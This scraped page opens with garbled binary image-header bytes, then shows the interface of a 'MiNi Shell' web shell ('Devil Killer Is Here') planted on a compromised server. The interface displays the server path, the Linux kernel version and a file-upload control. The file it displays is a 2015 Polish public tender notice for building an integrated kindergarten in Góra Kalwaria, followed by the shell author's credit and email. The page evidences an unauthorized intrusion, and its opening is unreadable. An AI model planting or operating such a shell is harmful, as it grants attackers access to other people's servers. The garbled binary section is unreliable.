JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/81130-N-2015.html

<p class="kh_header"><b>Góra Kalwaria: Budowa Przedszkola Integracyjnego  w  Górze Kalwarii</b><br>
<b>Numer ogłoszenia: 81130 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra Kalwaria , ul. 3 Maja 10, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 22/7273414, faks 22/7273414.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorakalwaria.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Przedszkola Integracyjnego  w  Górze Kalwarii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia   jest   budowa   przedszkola  integracyjnego  w  Górze  Kalwarii 
na terenie  dz. nr ew.:  7, 110, 112 z obrębu (3 - 02), zgodnie z  pozwoleniem na  budowę z dnia 03.11.2011, projektem budowlano-wykonawczym, obowiązującymi  przepisami,  zasadami  sztuki  budowlanej  zaś  po  wybudowaniu obiektu  uzyskanie  pozwolenia  na   użytkowanie  w  imieniu  Zamawiającego.

Dane techniczne obiektu:
- kubatura  	               -  5 537,55 m3 
- powierzchnia zabudowy      -  1 714,00 m2	
- powierzchnia całkowita       -  1 714,00 m2	
- powierzchnia użytkowa 	-  1 430.00 m2
- wysokość	                       -       4.78 m
- ilość kondygnacji                -       1

I. Budowa  przedszkola  integracyjnego  została  podzielona  na 2 etapy. 
W  I  Etapie  do wykonania  pozostaje  zakres  robót   określony  w  dokumentacji projektowo-budowlanej, w  przedmiarze  robót  oraz  w niniejszym  opisie  z  następującymi
wyłączeniami  z  wykonania:
1. Pomieszczenia  Żłobka  w Przedszkolu
-  wyłączenie z wykonania wyposażenia technologicznego  pomieszczeń  żłobka,
-  wyłączenie z wykonania  wyposażenia  łazienek  żłobka.
-  wyłączenie z wykonania  instalacji  sanitarnych  wewnętrznych - żłobka.
-  wyłączenie z wykonania  instalacji elektrycznych, instalacji oświetlenia  podstawowego  i
   awaryjnego, gniazd wtyczkowych 230 V, 400 V - żłobka.
-  wyłączenie z  wykonania  umeblowania i  wyposażenia  wewnętrznego  za  wyjątkiem
   wyposażenia i  sprzętu  wyszczególnionego  w  przedmiarach  robót  oraz  w  dokumentacji
    projektowej.
2. Obiekt  Przedszkola.
- wyłączenie z wykonania  umeblowania  sal przedszkolnych i gabinetów.
3. Zagospodarowaniu  terenu:
- wyłączenie z wykonania  i wyposażenia  placów zabaw oznaczonych  na  projekcie zagospodarowania   terenu  symbolem  literowo-cyfrowym  PZ 4,  PZ 5,  PZ 6  i  PZ 7, 
-  wyłączenie z wykonania części nawierzchni mineralnej (od strony południowo-zachodniej)  licząc od  początku  placu zabaw - PZ 4  do końca  placu zabaw - PZ 7, 
- wyłączenie z wykonania   nasadzeń  na  terenie wzdłuż  pasa  ulicznego (przed ogrodzeniem zewnętrznym Przedszkola), od strony ul. Bema,  na  którym  są zlokalizowane  parkingi i chodniki, 
- zmiana materiału  nawierzchni z kostki na nawierzchnię z ubitego żwiru  na miejscach  postojowych oznaczonych nr 1-16 (zlokalizowanych na terenie  przedszkola).
- wyłączenie z wykonania  fragmentu  chodnika  w  pasie ulicznym w narożniku od  strony  północno - wschodniej  od strony ul. Bema,
- wyłączenie  z  wykonania projektowanych  nasadzeń  drzewami  i  krzewami ozdobnymi
na terenie przedszkola, wewnątrz terenu ogrodzonego, 
- wyłączenie  z  wykonania  ogrodzeń wewnętrznych, 
- wyłączenie z wykonania  tarasów drewnianych (poz. 138 przedmiaru robót - Roboty budowlane), 
- wyłączenie z wykonania chodnika przy zawrotce oraz chodnika wzdłuż sali rekreacyjnej oraz pozostałej części chodnika obwodowego , 
- wyłączenie z wykonania  ławek  i  drobnych  elementów  małej  architektury (z  wyjątkiem dwóch  ławek  oznaczonych na projekcie  zagospodarowania symbolem  Ł1 i Ł2 oraz wykonania 2 kompletnych  piaskownic przy placu  zabaw PZ 1 i  PZ 2 ).

Uwaga: Dodatkowe  informacje  pozwalające  zlokalizować elementy zagospodarowania terenu   przewidziane  do wykonania  oraz  wyłączone z wykonania  zostały  zamieszczone  na planszy  zbiorczej  na  wykonanej  odbitce  z  kopii  projektu  zagospodarowania  terenu (zał. nr A).
Projekty  budowlane, Projekty wykonawcze, obejmują budowę kompletnego Przedszkola  - za  wyjątkiem wyłączeń wyżej  opisanych.
 
II.  Przedmiot zamówienia oprócz robót budowlanych i prac wymienionych w załączonej dokumentacji projektowej, Szczegółowej Specyfikacji Technicznej Wykonania i Odbioru Robót, przedmiarze robót, obejmuje m.in. następujące  czynności i obowiązki Wykonawcy: 
1.Opracowanie planu bezpieczeństwa i ochrony zdrowia oraz prowadzenie na  bieżąco
   dziennika budowy.
2. Wytyczenie obiektu przez uprawnionego geodetę, pełna obsługa geodezyjna wykonywana    przez uprawnionego geodetę, udokumentowana stosownymi szkicami powykonawczymi    oraz wpisami do dziennika budowy.
3.  Zagospodarowanie i zabezpieczenie placu budowy polegające na:
3a.Wydzieleniu terenu, na którym będą prowadzone prace, ogrodzeniem.
3b.Zapewnieniu całodobowego dozoru placu budowy;
3c.Zorganizowaniu zaplecza budowy, w tym części magazynowej, które powinno być 
     usytuowane na terenie placu budowy, zgodnie z  opracowanym projektem organizacji      placu budowy;
3d.Przyjęciu przez wykonawcę pełnej odpowiedzialności za materiały, narzędzia i urządzenia      znajdujące się na budowie, oraz za bezpieczeństwo osób znajdujących się na terenie      budowy;
4. Przedłożenie na  dzień  podpisania umowy, harmonogramu  rzeczowo  finansowego oraz     przestrzeganie terminów z niego wynikających po zaakceptowaniu go przez
    Zamawiającego.
5. Przedłożenia aktualnej polisy ubezpieczeniowej od odpowiedzialności cywilnej.
6. Przekazywanie do badań wytrzymałościowych próbek betonu użytego do poszczególnych     elementów konstrukcyjnych obiektu, przekazywanie Zamawiającemu wyników ww. badań   niezwłocznie po ich uzyskaniu.
7. Roboty porządkowo - czystościowe po zakończeniu robót zarówno przedmiotowego obiektu jak i terenu budowy wraz z zapleczem.
8. Opracowanie w dwóch egzemplarzach i przekazanie po zakończeniu robót Zamawiającemu dokumentacji powykonawczej wraz z inwentaryzacją geodezyjną, protokołami pomiarów i prób poszczególnych instalacji (w tym opinii kominiarskiej o stanie technicznym  i drożności przewodów wentylacji grawitacyjnej) oraz świadectwem energetycznym obiektu oraz instrukcji  użytkowania obiektu i bezpieczeństwa pożarowego.
9. Przygotowanie obiektu i skompletowanie dokumentacji umożliwiającej odbiór obiektu i jego dopuszczenie do użytkowania przez Państwową Inspekcję Sanitarną, Państwową Inspekcję Straży Pożarnej, Powiatowego Inspektora Nadzoru Budowlanego i Urząd Dozoru Technicznego.
10. Warunki poboru i odpłatności za energię elektryczną potrzebną do wykonania budowy  (Techniczne Warunki Zasilania, prowizorkę budowlaną), zapewni sobie wykonawca na  własny koszt w PGE  Dystrybucja S.A.  Oddział Warszawa, Rejon Energetyczny Konstancin Jeziorna  w  ramach  kosztów  przygotowania placu budowy.
11. Warunki  poboru wody i gazu Wykonawca  zapewnia we własnym zakresie poprzez montaż  zestawu  podlicznikowego  lub wykona  docelowe przyłącze  zgodnie z projektem. 
Ewentualny pobór gazu   (do osuszania i grzania budynku) po przekazaniu kotłowni do odbioru i użytkowania. Koszty poboru gazu (tj. opłata stała, abonamentowa, przesyłowa wraz z kosztami za faktyczne zużycie gazu) będą obciążać Wykonawcę do czasu odbioru końcowego obiektu. Koszty zużycia wody i odprowadzenia ścieków, energii i gazu będą obciążać Wykonawcę do czasu odbioru końcowego obiektu. 
W cenie oferty należy uwzględnić:  
Wykonawca zleci inwentaryzację geodezyjną powykonawczą przyłączy i urządzeń podziemnych i  pokryje  koszty wykonania  odbioru  technicznego. 
Wykonawca pokryje wszelkie koszty i opłaty związane z wyłączeniami i włączeniami gazociągu oraz sieci wod. - kan. na czas prowadzenia robót.
Wszelkie formalności (przygotowanie materiałów do podpisania umowy sprzedaży na dostawę gazu oraz na dostawę wody  i odprowadzenie ścieków, zawiezienie ich do Gazowni Warszawskiej i ZGK Sp. z o.o. Góra Kalwaria, opłaty, odbiory związane z MSG Sp. z o.o. - Zakład Gazowniczy Warszawa, ZGK Sp. z o.o. Góra Kalwaria, UDT, Sanepid  należą do Wykonawcy ( wartość usług należy wkalkulować w cenie  ryczałtowej).
Wszelkie formalności (przygotowanie materiałów do podpisania nowej umowy sprzedaży energii elektrycznej, zawiezienie ich do  PGE  Dystrybucja S.A.  Oddział Warszawa, Rejon Energetyczny Konstancin Jeziorna), opłaty, odbiory związane z  PGE  Dystrybucja S.A. Oddział Warszawa, Rejon Energetyczny Konstancin Jeziorna   oraz wykonanie inwentaryzacji powykonawczej  należą do Wykonawcy (wartość usług należy wkalkulować w cenę  oferty).
Energię elektryczną potrzebną do wykonania budowy (Techniczne Warunki Zasilania, prowizorkę budowlaną) zapewni sobie Wykonawca na własny koszt w  PGE  Dystrybucja S.A.  Oddział Warszawa, Rejon Energetyczny Konstancin Jeziorna.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 100  000,00 zł.
Słownie złotych: sto tysięcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się znajomością wykonania podobnych robót t.j. wykonania co najmniej jednej  roboty budowlanej polegającej na budowie, przebudowie, rozbudowie placówki oświatowej lub budynku użyteczności publicznej (z wyłączeniem budynków kultu religijnego, usług bankowych, handlu, gastronomii, usług - w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym; biurowych i socjalnych) w ciągu ostatnich  5 lat  o   wartości minimum 3.000.000,00 zł brutto i potwierdzonej dowodami, że zostały wykonane w sposób należyty  oraz wskazujących  czy zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) odpowiednimi  osobami  w celu realizacji zamówienia tj. przynajmniej:
- niżej wymienionymi osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w budownictwie oraz posiadającymi aktualne zaświadczenie o przynależności do właściwej Izby Samorządu Zawodowego tj.:
Kierownikiem budowy - uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej
Kierownikiem robót elektrycznych -  uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
Kierownikiem robót sanitarnych - uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych
Kierownikiem robót drogowych - uprawnienia do kierowania robotami w branży drogowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji i rękojmi - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z brzmieniem art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość zmiany niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a) nie zawinionych przez Wykonawcę, przedłużających się terminów uzyskania zgód 
i zezwoleń, koniecznych do realizacji Przedmiotu Umowy, wydawanych przez organy 
i podmioty niezależne od Wykonawcy i Zamawiającego,
b) w przypadku wystąpienia opadów atmosferycznych albo innych niekorzystnych warunków atmosferycznych, których skala w sposób istotny odbiega od średniej wieloletniej określonej przez Instytut Meteorologii i Gospodarki Wodnej w Warszawie, uniemożliwiających lub znacznie utrudniających prowadzenie robót,
c) w przypadku natrafienia na przeszkody np. podziemne, których na etapie opracowywania projektu nie można było przewidzieć (np. niezainwentaryzowane odcinki sieci podziemnych, zakopane odpady niebezpieczne, niewybuchy, znaleziska podlegające nadzorowi archeologicznemu, których zbadanie wymaga wstrzymania prac decyzją konserwatora zabytków),
d) w przypadku niezależnej od Zamawiającego konieczności wykonania i przekazania Wykonawcy dokumentacji zamiennej,
e) w przypadku zmiany ustawowej stawki podatku VAT.
f) skrócenia terminu realizacji za zgodą Zamawiającego.
g) zmniejszenia wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu realizacji robót,
h) wydłużenia terminu gwarancji,
i) robót zamiennych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa wykonywania robót budowlanych lub usprawnienia procesu budowlanego, po wcześniejszym uzgodnieniu możliwości wprowadzenia rozwiązań zamiennych - bez konieczności zwiększania wynagrodzenia ryczałtowego Wykonawcy,
j) robót zamiennych, jeżeli nie odstępują one w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 lub 6 ustawy Pb z zastrzeżeniem art. 57 ust. 2 ustawy Pb, po wcześniejszym uzgodnieniu możliwości wprowadzenia rozwiązań zamiennych - bez konieczności zwiększania wynagrodzenia ryczałtowego Wykonawcy,
k) wszelkich zmian, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
l) wszelkich zmian, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie przedmiotu zamówienia.
m) zmiany danych adresowych Zamawiającego lub Wykonawcy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. 3-go Maja 10
05-530 Góra Kalwaria 
Biuro Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy
ul. 3-go Maja 10
05-530 Góra Kalwaria 
Biuro Obsługi Mieszkańca.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com